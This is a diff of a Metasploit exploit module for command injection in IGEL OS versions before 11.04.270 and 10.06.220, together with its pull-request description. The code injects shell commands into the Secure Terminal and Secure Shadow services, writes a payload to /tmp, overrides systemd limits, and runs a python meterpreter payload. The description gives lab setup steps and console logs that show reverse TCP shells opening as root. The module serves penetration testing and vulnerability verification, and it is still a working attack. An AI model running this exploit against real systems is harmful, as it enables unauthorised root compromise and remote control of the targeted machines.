+    register_advanced_options(
+      [
+        # must enable SSL
+        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true]),
+      ]
+    )
+  end
+
+
+  def check
+    probe = '<igel_scan></igel_scan>'
+
+    begin
+      sock = Rex::Socket::Udp.create(
+        'PeerHost'  =>  datastore['RHOST'] || rhost,
+        'PeerPort'  => 30005,
+        'LocalHost' =>  datastore['CHOST'] || chost || "0.0.0.0",
+        'LocalPort' => (datastore['CPORT'] || cport || 0).to_i,
+        'Context'   => {
+            'Msf' => framework,
+            'MsfExploit' => self
+        },
+      )
+
+      sock.put(probe)
+      res = sock.recvfrom(65535, 0.5)
+      if not res
+        return Exploit::CheckCode::Unknown
+      end
+
+      probe_response = res[0]
+      matches = probe_response.match(/firmwareversion=<([0-9\.]+)>/)
+      if not matches
+        return Exploit::CheckCode::Unknown
+      end
+
+      version = matches.captures[0]
+      vprint_status("IGEL OS Version: #{version}")
+      major, minor, patch, revision = version.split(".")
+      if major.to_i == 10
+        if minor.to_i < 6 or  (minor.to_i == 6 and patch.to_i < 220)
+          return Exploit::CheckCode::Appears
+        end
+      elsif major.to_i == 11
+        if minor.to_i < 4 or  (minor.to_i == 4 and patch.to_i < 270)
+          return Exploit::CheckCode::Appears
+        end
+      end
+
+      return Exploit::CheckCode::Safe
+
+    rescue ::Exception => e
+      vprint_error("Unknown err: #{e.class} #{e}")
+      return Exploit::CheckCode::Unknown
+    ensure
+      sock.close if sock
+    end
+  end
+
+
+  # execute a shell command on the target.
+  # cmdstr is limited to 223 characters
+  def exec_cmd(cmdstr)
+    if cmdstr.length > 223
+      raise ArgumentError.new("Attempted command is too large")
+    end
+
+    cmdfull = "#{cmdstr};false"
+    vprint_status("executing #{cmdfull}")
+    retries = 0
+
+    begin
+      connect
+      sock.put(%(PROXYCMD PW_;#{cmdfull}))
+    rescue ::Rex::ConnectionRefused, Errno::ECONNRESET => e
+      if retries < 5
+        retries += 1
+        sleep 0.5 * (2**retries)
+        vprint_status("retrying command - #{retries}")
+        retry
+      else
+        vprint_error("retries exhausted: #{e.class} #{e}")
+        raise e
+      end
+    rescue ::Exception => e
+      vprint_error("failed: #{e.class} #{e}")
+      raise e
+    ensure
+      disconnect
+    end
+  end
+
+
+  # chunks up buffer, encodes chunk as a hex string, and echos it to path one chunk at a time
+  def write_file(buf, path)
+    slice_size = (223 - %(bash -c 'echo -ne "">>#{path}').length) / 4
+    buf.split("").each_slice(slice_size) do |ary|
+      buf_part = ary.join
+      hex = buf_part.each_byte.map {|b| "\\x#{b.to_s(16)}"}.join
+      begin
+        exec_cmd(%(bash -c 'echo -ne "#{hex}">>#{path}'))
+      rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+        fail_with(Failure::Unreachable, "Failed writing to #{path} with error #{e}.")
+      rescue ::Exception => e
+        fail_with(Failure::Unknown, "Failed writing to #{path} with error #{e}.")
+      end
+    end
+  end
+
+
+  # somewhat arbitrary cutoff of what designates a large payload
+  def big_payload?
+    if payload.encoded.length > 1024
+      return true
+    end
+    return false
+  end
+
+
+  def adjust_systemd_props
+    # Adjust limits to keep throttling from stopping the services or otherwise
+    # slowing us down
+    svc = "vnc"
+    if datastore['RPORT'] == 5900
+      svc = "vnc"
+    elsif datastore['RPORT'] == 30022
+      svc = "telnet"
+    end
+
+    print_status("Overriding igel-#{svc}-ssl-connector.service StartLimitBurst")
+    exec_cmd(%(mkdir /etc/systemd/system/igel-#{svc}-ssl-connector.service.d))
+    exec_cmd(%(printf "[Service]\\nStartLimitBurst=9999\\n" > /etc/systemd/system/igel-#{svc}-ssl-connector.service.d/override.conf))
+    print_status("Overriding igel-#{svc}-ssl-connector.socket TriggerLimitBurst")
+    exec_cmd(%(mkdir /etc/systemd/system/igel-#{svc}-ssl-connector.socket.d))
+    exec_cmd(%(printf "[Socket]\\nTriggerLimitBurst=9999\\n" > /etc/systemd/system/igel-#{svc}-ssl-connector.socket.d/override.conf))
+    exec_cmd(%(systemctl daemon-reload))
+  end
+
+
+  def cleanup_systemd_props
+    svc = "vnc"
+    if datastore['RPORT'] == 5900
+      svc = "vnc"
+    elsif datastore['RPORT'] == 30022
+      svc = "telnet"
+    end
+
+    print_status("Removing override for igel-#{svc}-ssl-connector.service")
+    exec_cmd(%(rm /etc/systemd/system/igel-#{svc}-ssl-connector.service.d/override.conf))
+    print_status("Removing override for igel-#{svc}-ssl-connector.socket")
+    exec_cmd(%(rm /etc/systemd/system/igel-#{svc}-ssl-connector.socket.d/override.conf))
+    exec_cmd(%(systemctl deamon-reload))
+  end
+
+
+  def remove_file(path)
+    begin
+      exec_cmd(%(rm #{path}))
+    rescue
+      print_warning("Failed to remove file #{path}.")
+    end
+  end
+
+
+  def exploit
+    path = "/tmp/#{rand_text_alphanumeric(4)}"
+    if big_payload?
+      print_warning("The payload selected is relatively large.  This could take a few minutes, be patient.")
+    end
+
+    adjust_systemd_props
+    print_status("Writing payload to file #{path}.")
+    write_file(payload.encoded, path)
+
+    begin
+      # execute python payload. systemd-run is used to prevent systemd from killing
+      # the resulting processes
+      print_status("Executing payload #{path}.")
+      exec_cmd(%(/usr/bin/systemd-run --scope bash -c "python #{path}"))
+
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      fail_with(Failure::Unreachable, "Failed executing payload with error #{e}.")
+
+    rescue ::Exception => e
+      fail_with(Failure::Unknown, "Failed executing payload with error #{e}.")
+    end
+
+    print_status("Removing payload file #{path}.")
+    remove_file(path)
+    cleanup_systemd_props
+  end
+
+end

--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -84,13 +84,13 @@ class MetasploitModule < Msf::Exploit::Remote
     res = sock.recvfrom(65535, 0.5)
     sock.close if sock
 
-    if !res || res[0].empty?
+    unless res && res[0]
       return Exploit::CheckCode::Unknown
     end
 
     probe_response = res[0]
     matches = probe_response.match(/firmwareversion=<([0-9.]+)>/)
-    if !matches
+    unless matches
       return Exploit::CheckCode::Unknown
     end
 


### PR DESCRIPTION
## Vulnerable Application

IGEL OS before 11.04.270 and 10.06.220 are vulnerable to remote command execution into a `system()` call via Secure Terminal and Secure Shadow services.

This module uses the vulnerability to modify certain systemd limits for the targeted service before transfering the payload; this is done to increase payload transfer throughput and preserve service stability.  After exploitation these changes are reverted. 

Secure Terminal/telnet_ssl_connector:   30022/tcp  
Secure Shadow/vnc_ssl_connector:        5900/tcp


## Verification Steps

Download Vulnerable IGEL OS version (e.g. 11.04.130) from: https://www.igel.com/software-downloads/workspace-edition/.

Unpack downloaded zip file and create a VM using the included .iso.

Navigate through the installation menus to install the firmware, reboot when prompted

After rebooted work through the presented configuration wizard.  In the Activation section use the starter license (selected by default).  Skip the ICG Agent Setup.  Upon completion the system will reboot again.

### Turn on vulnerable services

1. Click on the launcher menu
2. Click on the gear icon
3. Select "Setup" from the Application menu to launch the Setup app
4. To enable vulnerable VNC service wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Shadow.  Ensure "Allow remote shadowing" and "Secure mode" are checked.
5. To enable vulnerable terminal wrapper: Under the configuration menu on the left Navigate to: System > Remote Access > Secure Terminal. Ensure "Secure Terminal" is checked.

### Exploitation

1. start msfconsole
2. `use exploit/linux/misc/igel_command_injection`
3. `set RHOST [TARGET IP]`
4. `set RPORT [30022 or 5900]`
5. `set LHOST [LOCAL IP]`
6. `exploit`

### Misc

To obtain the IGEL's IP address to test against click the up/down arrows on the right side of the task bar then click "More Details".  A shell is available on a virtual console by ctrl+alt+F11, switch back to the GUI with ctrl+alt+F1.

This module has been successfully tested against IGEL OS 11.04.130 and 10.05.500 with metasploit framework 6.0.31-dev on Kali.


## Scenarios

### IGEL OS 11.04.130

Targeting the Secure Terminal service (30022/tcp):

```
msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.224
RHOST => 192.168.120.224
msf6 exploit(linux/misc/igel_command_injection) > check
[*] 192.168.120.224:30022 - The target appears to be vulnerable.
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.service StartLimitBurst
[*] 192.168.120.224:30022 - Overriding igel-telnet-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.224:30022 - Writing payload to file /tmp/CPr9.
[*] 192.168.120.224:30022 - Executing payload /tmp/CPr9.
[*] 192.168.120.224:30022 - Removing payload file /tmp/CPr9.
[*] Sending stage (39324 bytes) to 192.168.120.224
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.224:48130) at 2021-03-25 12:29:45 -0400
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.service
[*] 192.168.120.224:30022 - Removing override for igel-telnet-ssl-connector.socket

meterpreter > getuid
Server username: root
meterpreter > 
```

### IGEL OS 10.05.500

Targeting the Secure Shadowing service (5900/tcp):

```
msf6 > use exploit/linux/misc/igel_command_injection 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/misc/igel_command_injection) > set LHOST eth0
LHOST => eth0
msf6 exploit(linux/misc/igel_command_injection) > set RHOST 192.168.120.226
RHOST => 192.168.120.226
msf6 exploit(linux/misc/igel_command_injection) > set RPORT 5900
RPORT => 5900
msf6 exploit(linux/misc/igel_command_injection) > run

[*] Started reverse TCP handler on 192.168.120.225:4444 
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.service StartLimitBurst
[*] 192.168.120.226:5900 - Overriding igel-vnc-ssl-connector.socket TriggerLimitBurst
[*] 192.168.120.226:5900 - Writing payload to file /tmp/lSmU.
[*] 192.168.120.226:5900 - Executing payload /tmp/lSmU.
[*] 192.168.120.226:5900 - Removing payload file /tmp/lSmU.
[*] Sending stage (39328 bytes) to 192.168.120.226
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.service
[*] 192.168.120.226:5900 - Removing override for igel-vnc-ssl-connector.socket
[*] Meterpreter session 1 opened (192.168.120.225:4444 -> 192.168.120.226:55144) at 2021-03-25 12:48:34 -0400

meterpreter > getuid
Server username: root
meterpreter > 
```